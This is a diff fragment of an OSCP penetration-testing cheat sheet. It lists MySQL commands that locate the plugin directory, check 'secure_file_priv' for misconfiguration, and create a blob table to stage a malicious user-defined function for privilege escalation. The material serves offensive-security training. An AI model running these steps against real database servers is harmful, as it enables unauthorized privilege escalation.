ccelikanil/Cheat-Sheets/OSCP-Cheat-Sheet.md

 mysql > use mysql;
-mysql > SHOW VARIABLES LIKE 'datadir';             <- Locate where the plugin files are (we need it to create exploitation function) mysql > SHOW VARIABLES LIKE '%plugin%';            <- Plugin location Server version: 5.7.30 MySQL Community Server (GPL)
+mysql > SHOW VARIABLES LIKE 'datadir';             <- Locate where the plugin files are (we need it to create exploitation function) mysql > SHOW VARIABLES LIKE '%plugin%';            <- Plugin location mysql> SHOW VARIABLES LIKE 'secure_file_priv';     <- Determine whether the database has been misconfigured to allow insecure handling of files
+Server version: 5.7.30 MySQL Community Server (GPL)

 mysql > CREATE TABLE potato(line blob);